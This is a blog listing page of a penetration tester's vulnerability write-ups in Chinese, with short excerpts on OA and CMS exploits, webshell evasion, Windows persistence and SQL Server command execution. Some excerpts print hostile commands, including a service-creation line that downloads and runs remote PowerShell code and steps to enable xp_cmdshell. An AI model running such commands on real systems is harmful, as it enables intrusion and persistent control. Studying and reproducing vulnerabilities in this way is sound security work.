![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
漏洞分析
文章平均质量分 79
Azjj98
擅长渗透测试、红蓝对抗、内网渗透、代码审计、WAF对抗、热爱安全、专心研究安全,多次参加大型攻防演练。
展开
-
.Net网站webshell 401?403?D盾拦截?一招内存马直接搞定
在参加某次公司项目时,在碰到一个.NEt的通用系统,通过审计发现了两个文件上传漏洞,网站管理员发现网站被上传webshell后,最开始是修改了网站的配置文件,导致脚本文件禁止执行,后来通过上传web.config的方式给绕过了,但是后面管理员又给服务器装了D盾,安全狗,天擎,导致上传的文件无法正常解析,尝试了各种免杀的aspx马,都是提示禁止执行脚本文件,最后通过加载内存马的方式绕过了D盾的检测。原创 2024-01-31 11:04:52 · 1518 阅读 · 0 评论 -
代码审计-靠网速的上传
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任前几天xe给了一套系统的源码,搭到本地审计了一下,大多数都是后台的漏洞,注入什么的,但是我在全局索引上传的时候,索引到了一个TEST上传的接口,不知道是不是开发在写代码的时候测试用的忘记删除了,前台确实没有找到调用这个的地方,如果不看源码,这个上传黑盒是测试不出来的,由于功能点比较简单,也没什么写的,简单记录一下,就不排版了看到源码目录下有个名叫TES.原创 2022-03-13 04:37:38 · 1242 阅读 · 0 评论 -
.net代码审计-有趣的上传
.net代码审计原创 2022-03-04 15:53:26 · 1183 阅读 · 1 评论 -
代码执行和命令执行漏洞小记
代码执行漏洞由于开发人员编写源码,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造语句提交,并交由服务器端执行。命令注入攻击中WEB服务器没有过滤类似system(),eval(),exec()等函数是该漏洞攻击成功的最主要原因。代码执行漏洞本质PHP代码执行漏洞可以将代码注入到应用中,最终到webserver去执行,用了相关函数、却存在可以控制的变量。代码执行产生的函数eval()preg_replace()create_function()assert() arr原创 2021-10-24 21:51:58 · 2852 阅读 · 0 评论 -
Axis2 弱口令 getshell 漏洞复现
Axis2Axis2是下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中默认后台:http://ip:p原创 2021-01-05 14:59:18 · 2215 阅读 · 0 评论 -
最新用友NC6.5文件上传漏洞
0x00漏洞公告用友NC产品文件上传的漏洞,恶意攻击者可以通过该漏洞上传任意文件,从而可能导致获取到目标系统管理权限,目前,官方暂未发布补丁公告,建议使用该产品用户及时关注官方安全漏洞公告和补丁更新动态。0x01影响范围用友NC远程代码执行漏洞影响版本:NC6.5之后版本。0x02漏洞描述根据分析,漏洞为文件上传漏洞,在无需登陆系统的情况下,通过某接口直接上传文件,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大,建议及时排查。0x03 漏洞exp原创 2020-12-09 10:30:10 · 9933 阅读 · 7 评论 -
Windows远控之权限维持
Windows权限维持一丶建立系统服务获得了管理员的权限可以选择建立系统服务来进行持久控制,会被杀软拦截。1、使用sc命令建立系统服务,可以选择执行上传的木马,或者powershell远程执行。sc create "nuoyan" binpath= "c:\accc.exe"sc create "主动防御" binpath= "cmd /c start powershell.exe IEX (new-object net.webclient).downloadstring('http:/原创 2020-11-23 21:02:39 · 1225 阅读 · 0 评论 -
UEditor .net版本任意文件上传
UEditor .net版本任意文件上传简介ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。百度的UEditor文本编辑器,近几年很少被曝出漏洞,事情没有绝对的,总会有漏洞,这次被曝出的漏洞是.net版本的,其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存原创 2020-11-22 14:54:32 · 929 阅读 · 0 评论 -
通过SQLserver执行系统命令
SQLserver执行命令方法一:xp_cmdshellexec master..xp_cmdshell "whoami"默认执行是关闭EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;将1修改为0则为关闭xp_cmdshell 被删除可采用xplog70.dll恢复Exec master.dbo.sp_addex...原创 2020-11-22 14:40:57 · 1680 阅读 · 0 评论 -
weblogic未授权命令执行(CVE-2020-14882)
weblogic未授权命令执行(CVE-2020-14882)前言因为最近太忙了,各种文档之类的乱七八糟的事,对于刚爆的weblogic未授权,fofa上找了几个国外的站测了一下,正好今天没什么事,打算写个文章记录一下0x00 漏洞介绍未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。0x01影响版本 Oracle Weblogic Server 10.3.6.0.0 Ora...原创 2020-11-06 13:32:37 · 1104 阅读 · 0 评论 -
PHP爆绝对路径方法
1、单引号爆路径说明:直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。www.xxx.com/news.php?id=149′2、错误参数值爆路径说明:将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。www.xxx.com/researcharchive.php?id=-13、Google爆路径说明:结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点原创 2020-10-06 11:30:15 · 1070 阅读 · 0 评论 -
PhpStudy_pro小皮最新版本nginx 默认存在任意文件解析漏洞
0x00 前言先给小皮介绍下:phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。我记得我可爱的Taoing在前段时间给我说过这个洞,因为是小皮(phpstudy_pro)默认自带的测试版本,也就是nginx 1.15.11 ,所以说如果用小皮搭建的系统,不变化nginx版.原创 2020-10-06 11:21:31 · 598 阅读 · 0 评论 -
泛微OA云桥 未授权任意文件读取
0x00 漏洞描述泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。0x01 影响版本2018-2019 多个版本。0x02 漏洞复现第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串第原创 2020-10-06 11:19:37 · 1692 阅读 · 0 评论 -
用友GRP-u8 XXE 漏洞复现
0x00 漏洞描述用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。0x01 漏洞利用条件无需登录0x02 漏洞复现POC:POST /Proxy HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)Host: localhostContent-Length:.原创 2020-10-06 11:18:47 · 1114 阅读 · 0 评论 -
通达OA 11.5 SQL注入漏洞复现
0x00 漏洞描述通达OA 11.5存在sql注入0x01 漏洞影响版本通达oa 11.50x02 漏洞复现1、下载通达OA 11.5https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe,点击安装2、创建一个普通账户test:test1234563.1、id参数存在sql注入利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入参数位置:/general/appbuilder/web/re..原创 2020-10-06 11:17:26 · 1094 阅读 · 1 评论 -
通达OA 11.7 后台sql注入getshell漏洞复现
0x00 漏洞描述通达OA 11.7存在sql注入0x01 漏洞影响版本通达oa 11.7利用条件:需要账号登录0x02 漏洞复现1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装2、condition_cascade参数存在布尔盲注POC:GET /general/hr/manage/query/delete_cascade.php?condition_cascade=se...原创 2020-10-06 11:15:45 · 643 阅读 · 0 评论 -
通达OA 任意文件上传+文件包含导致RCE
0x00 漏洞描述ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入shell,然后结合文件包含漏洞getshell0x01 漏洞影响版本通达OA V11版 <= 11.3 20200103 通达OA 2017版 <= 10.19 20190522 通达OA 2016版 <= 9.13 20170710 通达OA 2015版 <= 8.15 .原创 2020-10-06 11:14:48 · 2153 阅读 · 1 评论 -
通达OA 11.2后台getshell漏洞复现
0x00 漏洞描述通达OA 11.2“组织”-》”管理员”-》附件上传处存在任意文件上传漏洞,结合“系统管理”-》”附件管理”-》”添加存储目录”,修改附件上传后保存的路径,最终导致getshell0x01 漏洞影响版本通达OA 11.20x02 漏洞复现1、下载https://cdndown.tongda2000.com/oa/2019/TDOA11.2.exe,windows下直接点击安装,管理用户admin,密码为空2、使用admin,密码为空登录,点击”系统管理”-》..原创 2020-10-06 11:13:03 · 1119 阅读 · 1 评论 -
通达OA任意文件删除/未授权访问+任意文件上传漏洞复现
0x00 简介通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。今天看了好多通达OA的文章,根据护网中出现的一些0day,进行一波分析,其中感觉9hu大佬分析的很到位,然后来以此为基准,一起来看一下这个影响较深的漏洞。然后我自己感觉,出现的漏洞只是表面的一些,其中还有肯定是未公布的,包括我之前在别的版本审..原创 2020-10-06 11:10:55 · 2168 阅读 · 0 评论 -
深信服 EDR终端检测响应平台漏洞
0x01 前言深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。提示:以下是本篇文章正文内容,下面案例可供参考0x02 影响范围fofa关键字搜索:title=”终端检测响应平台”0x03 远...原创 2020-10-06 11:07:08 · 480 阅读 · 0 评论 -
PHPcms V9 任意文件上传漏洞
之前碰到一个站点,存在目录遍历,看到upload目录下上传了好多php的大马,说明这网站肯定是有漏洞的,看了一下网站指纹,是phpcms的,正好借此网站复现一下此漏洞一丶漏洞简介此漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。二丶影响版本phpcms v9.6.0三丶漏洞分析漏洞利用点是注册的地方,我们来看一下网上常用的一个payload:http://127.0.0.1/index.php.原创 2020-09-04 15:37:46 · 5762 阅读 · 1 评论 -
BIG-IP ADC RCE漏洞(CVE-2020-5902)
BIG-IP ADC RCE漏洞(CVE-2020-5902)F5(F5 Networks)作为全球领先的应用交付网络(ADN)领域的厂商,6月被曝出BIG-IP(负载均衡)中两个严重漏洞,代号分别为CVE-2020-5902和CVE-2020-5903,就在上次HW期间,就见到过很多这个F5的设备,金融企业存在这种高危漏洞,想想都可怕。一丶漏洞简介 该漏洞是BIG-IP管理界面中称为“远程代码执行”漏洞,称为TMUI(流量管理用户界面)。未经身份验证的攻击者可以通过将恶意制作的HTTP请原创 2020-07-08 13:09:15 · 519 阅读 · 0 评论 -
一次弱口令渗透BC站
因为某种原因,接手了一个授权的bc站。内心是拒绝的,但是没办法,硬着头皮收下了。其实都知道,bc站不是很好弄,在大佬眼里,可能就是掏出一个0day就进去了但像我这种dd,只敢远观。打开主页,还算清新的画风,比那些打开就这闪那闪花里胡哨的站舒服多了。简单的扫了一下目录,扫出了两个比较有用的的东西就是一个后台,一个探针见到后台,废话不多说,直接弱口令套餐来一份得到的结果肯定是 密码错误X1 密码错误X2 密码错误X3…………算了,不浪费时间了,看一下探针~ 根据探针,得知网站的根目原创 2020-06-04 22:24:04 · 2860 阅读 · 6 评论 -
Think CMF X任意内容包含漏洞分析复现
Think CMF X任意内容包含漏洞分析复现0x00 简介ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。0x01漏原创 2020-05-22 17:41:04 · 487 阅读 · 0 评论 -
记录一次游戏私服getshell过程
记录一次游戏私服getshell过程晚上闲着无聊,想做点事情,用fofa搜了一下站点,想挖几个洞,结果看到了一个游戏私服的宣传网站,我这一看跟我之前搞过的一个站好像是一套源码。就试着想搞一搞,正好记录一下写个文章,废话不多说了,开搞。传统的游戏宣传页面,没啥东西试着一下输入了一下这套私服源码的后台目录,果真是一摸一样,跳到后台了~这套源码用的是aspcms,这版本后台有个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取参数没有使用自定义的filterPara函数过滤,导致sql注原创 2020-05-20 22:51:34 · 4270 阅读 · 4 评论 -
致远OA系统多版本Getshell
致远OA系统多版本Getshell晚间无聊,想挖一波edu,然后碰到个致远的OA系统,查了一下版本号,存在版本漏洞可以直接拿shell。网上复现的案例比较少,而且步骤都不是很详细,于是亲自找了个exp复现了一下。一丶漏洞介绍致远OA存在任意文件写入漏洞,远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务...原创 2020-05-06 02:34:11 · 5131 阅读 · 1 评论 -
shiro反序列化漏洞
shrio反序列化漏洞一、漏洞介绍Shiro 是 Java 的一个安全框架。Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。参考文章:ht...原创 2020-04-29 15:39:29 · 10676 阅读 · 0 评论 -
复现通达OA前台任意用户登录漏洞
因为看到最近各个博客论坛都在复现这个通达OA的漏洞,正好那天同事给我发了一个poc,正好试一下原创 2020-04-27 13:02:13 · 2299 阅读 · 0 评论